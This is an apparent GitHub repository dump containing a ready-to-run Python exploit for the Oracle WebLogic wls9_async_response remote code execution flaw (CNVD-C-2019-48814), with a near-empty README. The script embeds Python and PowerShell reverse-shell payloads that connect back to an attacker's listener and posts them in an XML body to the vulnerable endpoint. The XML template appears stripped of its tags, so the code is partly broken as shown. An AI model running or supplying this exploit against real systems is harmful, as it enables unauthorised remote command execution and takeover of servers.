├── CNVD-C-2019-48814.py ├── README.md └── gui.jpeg /CNVD-C-2019-48814.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | # Exploit Title: Weblogic wls9_async_response RCE 4 | # Exploit Author: fuhei 5 | # CNVD: CNVD-C-2019-48814 6 | # Usage: python exploit.py -l 10.10.10.10 -p 4444 -r http://www.lovei.org:7001/ 7 | # (Netcat) Example exploit listener: nc -nlvp 4444 8 | 9 | from sys import exit 10 | import requests 11 | from requests import post 12 | from argparse import ArgumentParser 13 | from random import choice 14 | from string import ascii_uppercase, ascii_lowercase, digits 15 | from xml.sax.saxutils import escape 16 | 17 | class Exploit: 18 | 19 | def __init__(self, check, rhost, lhost, lport, windows): 20 | self.url = rhost if not rhost.endswith('/') else rhost.strip('/') 21 | self.lhost = lhost 22 | self.lport = lport 23 | self.check = check 24 | if windows: 25 | self.target = 'win' 26 | else: 27 | self.target = 'unix' 28 | 29 | if self.target == 'unix': 30 | # Unix reverse shell 31 | # You should also be able to instead use something from MSFVenom. E.g. 32 | # msfvenom -p cmd/unix/reverse_python LHOST=10.10.10.10 LPORT=4444 33 | self.cmd_payload = ( 34 | "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket." 35 | "SOCK_STREAM);s.connect((\"{lhost}\",{lport}));os.dup2(s.fileno(),0); os.dup2(" 36 | "s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'" 37 | ).format(lhost=self.lhost, lport=self.lport) 38 | else: 39 | # Windows reverse shell 40 | # Based on msfvenom -p cmd/windows/reverse_powershell LHOST=10.10.10.10 LPORT=4444 41 | self.cmd_payload = ( 42 | r"powershell -w hidden -nop -c function RSC{if ($c.Connected -eq $true) " 43 | r"{$c.Close()};if ($p.ExitCode -ne $null) {$p.Close()};exit;};$a='" + self.lhost +"" 44 | r"';$p='"+ self.lport + "';$c=New-Object system.net.sockets.tcpclient;$c.connect($a" 45 | r",$p);$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize;" 46 | r"$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';" 47 | r"$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;" 48 | r"$p.StartInfo.UseShellExecute=0;$p.Start();$is=$p.StandardInput;" 49 | r"$os=$p.StandardOutput;Start-Sleep 1;$e=new-object System.Text.AsciiEncoding;" 50 | r"while($os.Peek() -ne -1){$o += $e.GetString($os.Read())};" 51 | r"$s.Write($e.GetBytes($o),0,$o.Length);$o=$null;$d=$false;$t=0;" 52 | r"while (-not $d) {if ($c.Connected -ne $true) {RSC};$pos=0;$i=1; while (($i -gt 0)" 53 | r" -and ($pos -lt $nb.Length)) {$r=$s.Read($nb,$pos,$nb.Length - $pos);$pos+=$r;" 54 | r"if (-not $pos -or $pos -eq 0) {RSC};if ($nb[0..$($pos-1)] -contains 10) {break}};" 55 | r"if ($pos -gt 0){$str=$e.GetString($nb,0,$pos);$is.write($str);start-sleep 1;if " 56 | r"($p.ExitCode -ne $null){RSC}else{$o=$e.GetString($os.Read());while($os.Peek() -ne" 57 | r" -1){$o += $e.GetString($os.Read());if ($o -eq $str) {$o=''}};$s.Write($e." 58 | r"GetBytes($o),0,$o.length);$o=$null;$str=$null}}else{RSC}};" 59 | ) 60 | self.cmd_payload = escape(self.cmd_payload) 61 | 62 | def cmd_base(self): 63 | if self.target == 'win': 64 | return 'cmd' 65 | return '/bin/sh' 66 | 67 | def cmd_opt(self): 68 | if self.target == 'win': 69 | return '/c' 70 | return '-c' 71 | 72 | 73 | def get_generic_check_payload(self): 74 | check_url = self.url + '/_async/AsyncResponseService' 75 | try: 76 | check = requests.get(check_url) 77 | #print check.text 78 | if 'Welcome' in check.text: 79 | return True 80 | else: 81 | return False 82 | except: 83 | return False 84 | 85 | def get_process_builder_payload(self): 86 | process_builder_payload = ''' 87 | 88 | xx 89 | xx 90 | 91 | 92 | 93 | 94 | {cmd_base} 95 | 96 | 97 | {cmd_opt} 98 | 99 | 100 | {cmd_payload} 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | ''' 110 | return process_builder_payload.format(cmd_base=self.cmd_base(), cmd_opt=self.cmd_opt(), 111 | cmd_payload=self.cmd_payload) 112 | 113 | def print_banner(self): 114 | print("=" * 80) 115 | print("CNVD-C-2019-48814 RCE Exploit") 116 | print("written by: fuhei") 117 | print("Remote Target: {rhost}".format(rhost=self.url)) 118 | print("Shell Listener: {lhost}:{lport}".format( 119 | lhost=self.lhost, lport=self.lport)) 120 | print("=" * 80) 121 | 122 | def post_exploit(self, data): 123 | headers = { 124 | "Content-Type": 125 | "text/xml;charset=UTF-8", 126 | "User-Agent": 127 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36" 128 | } 129 | payload = "/_async/AsyncResponseService" 130 | 131 | vulnurl = self.url + payload 132 | try: 133 | req = post( 134 | vulnurl, data=data, headers=headers, timeout=10, verify=False) 135 | if self.check: 136 | print("[*] Did you get an HTTP GET request back?") 137 | else: 138 | print("[*] Did you get a shell back?") 139 | except Exception as e: 140 | print('[!] Connection Error') 141 | print(e) 142 | 143 | def run(self): 144 | self.print_banner() 145 | if self.check: 146 | print('[+] Generating generic check payload') 147 | payload = self.get_generic_check_payload() 148 | if payload: 149 | print '[*] Having this vulnerability' 150 | return True 151 | else: 152 | print '[!] This vulnerability does not exist' 153 | return False 154 | else: 155 | print('[+] Generating execution payload') 156 | payload = self.get_process_builder_payload() 157 | print('[*] Generated:') 158 | print(payload) 159 | print('[+] Running {target} execute payload').format(target=self.target) 160 | self.post_exploit(data=payload) 161 | 162 | 163 | if __name__ == "__main__": 164 | parser = ArgumentParser( 165 | description= 166 | 'CNVD-C-2019-48814 Oracle wls9_async_response exploit.' 167 | ) 168 | parser.add_argument( 169 | '-l', 170 | '--lhost', 171 | required=True, 172 | dest='lhost', 173 | nargs='?', 174 | help='The listening host that the remote server should connect back to') 175 | parser.add_argument( 176 | '-p', 177 | '--lport', 178 | required=True, 179 | dest='lport', 180 | nargs='?', 181 | help='The listening port that the remote server should connect back to') 182 | parser.add_argument( 183 | '-r', 184 | '--rhost', 185 | required=True, 186 | dest='rhost', 187 | nargs='?', 188 | help='The remote host base URL that we should send the exploit to') 189 | parser.add_argument( 190 | '-c', 191 | '--check', 192 | dest='check', 193 | action='store_true', 194 | help= 195 | 'Execute a check using HTTP to see if the host is vulnerable. This will cause the host to issue an HTTP request. This is a generic check.' 196 | ) 197 | parser.add_argument( 198 | '-w', 199 | '--win', 200 | dest='windows', 201 | action='store_true', 202 | help= 203 | 'Use the windows cmd payload instead of unix payload (execute mode only).' 204 | ) 205 | 206 | args = parser.parse_args() 207 | 208 | exploit = Exploit( 209 | check=args.check, rhost=args.rhost, lhost=args.lhost, lport=args.lport, 210 | windows=args.windows) 211 | exploit.run() 212 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # CNVD-C-2019-48814 2 | 3 | ![](./gui.jpeg) 4 | -------------------------------------------------------------------------------- /gui.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/fuhei/CNVD-C-2019-48814/973645e7a72bf5b123a0bf40b0c5d921a926a7c5/gui.jpeg --------------------------------------------------------------------------------